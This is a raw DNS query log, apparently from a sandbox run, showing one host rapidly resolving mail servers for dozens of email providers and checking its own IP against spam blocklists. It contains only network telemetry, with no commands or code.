Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.153692961 CEST	8.8.8.8	192.168.2.4	0xaafa	No error (0)	mail.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:47.153692961 CEST	8.8.8.8	192.168.2.4	0xaafa	No error (0)	mail.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:47.158108950 CEST	8.8.8.8	192.168.2.4	0x6582	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.158108950 CEST	8.8.8.8	192.168.2.4	0x6582	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.198486090 CEST	8.8.8.8	192.168.2.4	0xfa77	No error (0)	mx00.mail.com		74.208.5.20	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.202173948 CEST	8.8.8.8	192.168.2.4	0x4bf9	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.523181915 CEST	8.8.8.8	192.168.2.4	0x8dae	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.523181915 CEST	8.8.8.8	192.168.2.4	0x8dae	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.523181915 CEST	8.8.8.8	192.168.2.4	0x8dae	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.523181915 CEST	8.8.8.8	192.168.2.4	0x8dae	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.523181915 CEST	8.8.8.8	192.168.2.4	0x8dae	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.523181915 CEST	8.8.8.8	192.168.2.4	0x8dae	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.523181915 CEST	8.8.8.8	192.168.2.4	0x8dae	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.523181915 CEST	8.8.8.8	192.168.2.4	0x8dae	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:49.425846100 CEST	8.8.8.8	192.168.2.4	0xa62c	No error (0)	verizon.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:49.664680004 CEST	8.8.8.8	192.168.2.4	0x2d3e	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:49.664680004 CEST	8.8.8.8	192.168.2.4	0x2d3e	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:49.664680004 CEST	8.8.8.8	192.168.2.4	0x2d3e	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:49.664680004 CEST	8.8.8.8	192.168.2.4	0x2d3e	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:49.664680004 CEST	8.8.8.8	192.168.2.4	0x2d3e	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:49.664680004 CEST	8.8.8.8	192.168.2.4	0x2d3e	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.351200104 CEST	8.8.8.8	192.168.2.4	0xf2b9	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.351200104 CEST	8.8.8.8	192.168.2.4	0xf2b9	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.351200104 CEST	8.8.8.8	192.168.2.4	0xf2b9	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.351200104 CEST	8.8.8.8	192.168.2.4	0xf2b9	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.351200104 CEST	8.8.8.8	192.168.2.4	0xf2b9	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.351200104 CEST	8.8.8.8	192.168.2.4	0xf2b9	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.351200104 CEST	8.8.8.8	192.168.2.4	0xf2b9	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.351200104 CEST	8.8.8.8	192.168.2.4	0xf2b9	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.388180971 CEST	8.8.8.8	192.168.2.4	0xe755	No error (0)	xamog.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:50.478040934 CEST	8.8.8.8	192.168.2.4	0xd5cc	No error (0)	mx.powered.name		62.141.42.208	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.734486103 CEST	8.8.8.8	192.168.2.4	0x763e	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.847928047 CEST	8.8.8.8	192.168.2.4	0xeceb	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.875380039 CEST	8.8.8.8	192.168.2.4	0xd7c1	No error (0)	wi.rr.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:50.965009928 CEST	8.8.8.8	192.168.2.4	0xa63a	No error (0)	pkvw-mx.msg.pkvw.co.charter.net		47.43.26.7	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:51.142786980 CEST	8.8.8.8	192.168.2.4	0x8204	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:51.550147057 CEST	8.8.8.8	192.168.2.4	0xd67a	No error (0)	smtp.yopmail.com		87.98.164.155	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:51.959331989 CEST	8.8.8.8	192.168.2.4	0x76ac	No error (0)	ymail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:51.959331989 CEST	8.8.8.8	192.168.2.4	0x76ac	No error (0)	ymail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:51.959331989 CEST	8.8.8.8	192.168.2.4	0x76ac	No error (0)	ymail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:52.004779100 CEST	8.8.8.8	192.168.2.4	0x8d57	No error (0)	mta7.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.004779100 CEST	8.8.8.8	192.168.2.4	0x8d57	No error (0)	mta7.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.004779100 CEST	8.8.8.8	192.168.2.4	0x8d57	No error (0)	mta7.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.004779100 CEST	8.8.8.8	192.168.2.4	0x8d57	No error (0)	mta7.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.004779100 CEST	8.8.8.8	192.168.2.4	0x8d57	No error (0)	mta7.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.004779100 CEST	8.8.8.8	192.168.2.4	0x8d57	No error (0)	mta7.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.004779100 CEST	8.8.8.8	192.168.2.4	0x8d57	No error (0)	mta7.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.004779100 CEST	8.8.8.8	192.168.2.4	0x8d57	No error (0)	mta7.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.071815014 CEST	8.8.8.8	192.168.2.4	0xf6ff	No error (0)	outlook.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:52.142525911 CEST	8.8.8.8	192.168.2.4	0x9ed	No error (0)	mx.interia.pl		217.74.65.64	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.146684885 CEST	8.8.8.8	192.168.2.4	0x3b1b	No error (0)	outlook-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.146684885 CEST	8.8.8.8	192.168.2.4	0x3b1b	No error (0)	outlook-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.602334023 CEST	8.8.8.8	192.168.2.4	0xf7fc	No error (0)	mx01.emig.gmx.net		212.227.17.5	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.937535048 CEST	8.8.8.8	192.168.2.4	0xe8c4	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.969620943 CEST	8.8.8.8	192.168.2.4	0xab84	No error (0)	asdooeemail.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:52.969620943 CEST	8.8.8.8	192.168.2.4	0xab84	No error (0)	asdooeemail.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:53.021488905 CEST	8.8.8.8	192.168.2.4	0xa4e7	No error (0)	mx4.beavis99.com		37.139.4.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:53.021488905 CEST	8.8.8.8	192.168.2.4	0xa4e7	No error (0)	mx4.beavis99.com		167.172.146.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:53.107018948 CEST	8.8.8.8	192.168.2.4	0x88b9	No error (0)	o3enzyme.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:53.107018948 CEST	8.8.8.8	192.168.2.4	0x88b9	No error (0)	o3enzyme.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:53.148138046 CEST	8.8.8.8	192.168.2.4	0x5f17	No error (0)	mxb.mailgun.org		52.38.190.177	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:53.148138046 CEST	8.8.8.8	192.168.2.4	0x5f17	No error (0)	mxb.mailgun.org		44.240.110.196	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:53.148138046 CEST	8.8.8.8	192.168.2.4	0x5f17	No error (0)	mxb.mailgun.org		34.214.89.214	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.018307924 CEST	8.8.8.8	192.168.2.4	0xc6d2	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.018307924 CEST	8.8.8.8	192.168.2.4	0xc6d2	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425570011 CEST	8.8.8.8	192.168.2.4	0x77a	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425714970 CEST	8.8.8.8	192.168.2.4	0x1b0b	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425714970 CEST	8.8.8.8	192.168.2.4	0x1b0b	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425714970 CEST	8.8.8.8	192.168.2.4	0x1b0b	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425714970 CEST	8.8.8.8	192.168.2.4	0x1b0b	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425714970 CEST	8.8.8.8	192.168.2.4	0x1b0b	No error (0)	mta6.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425714970 CEST	8.8.8.8	192.168.2.4	0x1b0b	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425714970 CEST	8.8.8.8	192.168.2.4	0x1b0b	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.425714970 CEST	8.8.8.8	192.168.2.4	0x1b0b	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:55.297852039 CEST	8.8.8.8	192.168.2.4	0x1631	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.293569088 CEST	8.8.8.8	192.168.2.4	0xc415	No error (0)	villageautogroup.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:56.293629885 CEST	8.8.8.8	192.168.2.4	0x68b6	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.341913939 CEST	8.8.8.8	192.168.2.4	0xfdc1	No error (0)	gmeil.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:56.348294020 CEST	8.8.8.8	192.168.2.4	0x1787	No error (0)	mx.sendgrid.net		167.89.115.46	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.348294020 CEST	8.8.8.8	192.168.2.4	0x1787	No error (0)	mx.sendgrid.net		167.89.118.48	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.352576971 CEST	8.8.8.8	192.168.2.4	0x2b61	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.355776072 CEST	8.8.8.8	192.168.2.4	0x817a	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.403563023 CEST	8.8.8.8	192.168.2.4	0x263a	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.405548096 CEST	8.8.8.8	192.168.2.4	0xc041	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.458043098 CEST	8.8.8.8	192.168.2.4	0x3d00	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.473388910 CEST	8.8.8.8	192.168.2.4	0x2e67	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.495336056 CEST	8.8.8.8	192.168.2.4	0x9a0	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.536621094 CEST	8.8.8.8	192.168.2.4	0x4637	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.579376936 CEST	8.8.8.8	192.168.2.4	0xda0a	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.657433033 CEST	8.8.8.8	192.168.2.4	0x6e0a	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.734846115 CEST	8.8.8.8	192.168.2.4	0xf720	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.802633047 CEST	8.8.8.8	192.168.2.4	0x238a	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752093077 CEST	8.8.8.8	192.168.2.4	0x9085	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752124071 CEST	8.8.8.8	192.168.2.4	0x11e0	No error (0)	mta7.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752124071 CEST	8.8.8.8	192.168.2.4	0x11e0	No error (0)	mta7.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752124071 CEST	8.8.8.8	192.168.2.4	0x11e0	No error (0)	mta7.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752124071 CEST	8.8.8.8	192.168.2.4	0x11e0	No error (0)	mta7.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752124071 CEST	8.8.8.8	192.168.2.4	0x11e0	No error (0)	mta7.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752124071 CEST	8.8.8.8	192.168.2.4	0x11e0	No error (0)	mta7.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752124071 CEST	8.8.8.8	192.168.2.4	0x11e0	No error (0)	mta7.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.752124071 CEST	8.8.8.8	192.168.2.4	0x11e0	No error (0)	mta7.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:57.830482006 CEST	8.8.8.8	192.168.2.4	0x8fcf	No error (0)	mx.wp.pl		212.77.101.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:58.127218962 CEST	8.8.8.8	192.168.2.4	0xb540	No error (0)	mx2.naver.com		125.209.238.137	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:58.424356937 CEST	8.8.8.8	192.168.2.4	0x2b2f	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.080513954 CEST	8.8.8.8	192.168.2.4	0xaa50	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.080513954 CEST	8.8.8.8	192.168.2.4	0xaa50	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.080513954 CEST	8.8.8.8	192.168.2.4	0xaa50	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.080513954 CEST	8.8.8.8	192.168.2.4	0xaa50	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.080513954 CEST	8.8.8.8	192.168.2.4	0xaa50	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.080513954 CEST	8.8.8.8	192.168.2.4	0xaa50	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.080513954 CEST	8.8.8.8	192.168.2.4	0xaa50	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.080513954 CEST	8.8.8.8	192.168.2.4	0xaa50	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.094127893 CEST	8.8.8.8	192.168.2.4	0x246f	No error (0)	dolphinmail.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:59.094127893 CEST	8.8.8.8	192.168.2.4	0x246f	No error (0)	dolphinmail.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:59.094127893 CEST	8.8.8.8	192.168.2.4	0x246f	No error (0)	dolphinmail.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:59.094127893 CEST	8.8.8.8	192.168.2.4	0x246f	No error (0)	dolphinmail.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:59.094127893 CEST	8.8.8.8	192.168.2.4	0x246f	No error (0)	dolphinmail.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:59.094127893 CEST	8.8.8.8	192.168.2.4	0x246f	No error (0)	dolphinmail.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:59.132874966 CEST	8.8.8.8	192.168.2.4	0x3b8b	No error (0)	mail01.dolphinmail.org		161.156.29.45	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.212954044 CEST	8.8.8.8	192.168.2.4	0x4d8c	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.629158020 CEST	8.8.8.8	192.168.2.4	0xaad2	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.636060953 CEST	8.8.8.8	192.168.2.4	0x1481	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.636060953 CEST	8.8.8.8	192.168.2.4	0x1481	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.750518084 CEST	8.8.8.8	192.168.2.4	0xa384	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:59.949440956 CEST	8.8.8.8	192.168.2.4	0xa2cf	No error (0)	onet.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:00.035933018 CEST	8.8.8.8	192.168.2.4	0x42ab	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:00.039654970 CEST	8.8.8.8	192.168.2.4	0x76a3	No error (0)	mx.poczta.onet.pl		213.180.147.146	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:00.727689028 CEST	8.8.8.8	192.168.2.4	0x289e	No error (0)	mx.wp.pl		212.77.101.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:00.880497932 CEST	8.8.8.8	192.168.2.4	0xb215	No error (0)	post.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:00.880497932 CEST	8.8.8.8	192.168.2.4	0xb215	No error (0)	post.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:00.918440104 CEST	8.8.8.8	192.168.2.4	0xb91c	No error (0)	mx00.mail.com		74.208.5.20	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.056723118 CEST	8.8.8.8	192.168.2.4	0x750e	No error (0)	internetlibero.it			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.107358932 CEST	8.8.8.8	192.168.2.4	0x9478	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.107358932 CEST	8.8.8.8	192.168.2.4	0x9478	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.107358932 CEST	8.8.8.8	192.168.2.4	0x9478	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.107358932 CEST	8.8.8.8	192.168.2.4	0x9478	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.107358932 CEST	8.8.8.8	192.168.2.4	0x9478	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.107358932 CEST	8.8.8.8	192.168.2.4	0x9478	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.107358932 CEST	8.8.8.8	192.168.2.4	0x9478	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.107358932 CEST	8.8.8.8	192.168.2.4	0x9478	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.129194975 CEST	8.8.8.8	192.168.2.4	0x677	No error (0)	mail1.penteres.it		178.250.66.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.271682024 CEST	8.8.8.8	192.168.2.4	0x707c	No error (0)	google.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.271682024 CEST	8.8.8.8	192.168.2.4	0x707c	No error (0)	google.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.271682024 CEST	8.8.8.8	192.168.2.4	0x707c	No error (0)	google.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.271682024 CEST	8.8.8.8	192.168.2.4	0x707c	No error (0)	google.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.271682024 CEST	8.8.8.8	192.168.2.4	0x707c	No error (0)	google.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.326764107 CEST	8.8.8.8	192.168.2.4	0xb98b	No error (0)	alt2.aspmx.l.google.com		74.125.200.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.707528114 CEST	8.8.8.8	192.168.2.4	0xec09	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:01.902863026 CEST	8.8.8.8	192.168.2.4	0x6105	No error (0)	earthlink.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.902863026 CEST	8.8.8.8	192.168.2.4	0x6105	No error (0)	earthlink.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.902863026 CEST	8.8.8.8	192.168.2.4	0x6105	No error (0)	earthlink.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.902863026 CEST	8.8.8.8	192.168.2.4	0x6105	No error (0)	earthlink.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:01.953357935 CEST	8.8.8.8	192.168.2.4	0x968c	No error (0)	mx01.oxsus-vadesecure.net		51.81.57.58	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:02.471982956 CEST	8.8.8.8	192.168.2.4	0xb842	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:02.934165955 CEST	8.8.8.8	192.168.2.4	0x2d92	No error (0)	jeffersonbox.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:02.934165955 CEST	8.8.8.8	192.168.2.4	0x2d92	No error (0)	jeffersonbox.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:02.934165955 CEST	8.8.8.8	192.168.2.4	0x2d92	No error (0)	jeffersonbox.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:02.934165955 CEST	8.8.8.8	192.168.2.4	0x2d92	No error (0)	jeffersonbox.com			MX (Mail exchange)	IN (0x0001)
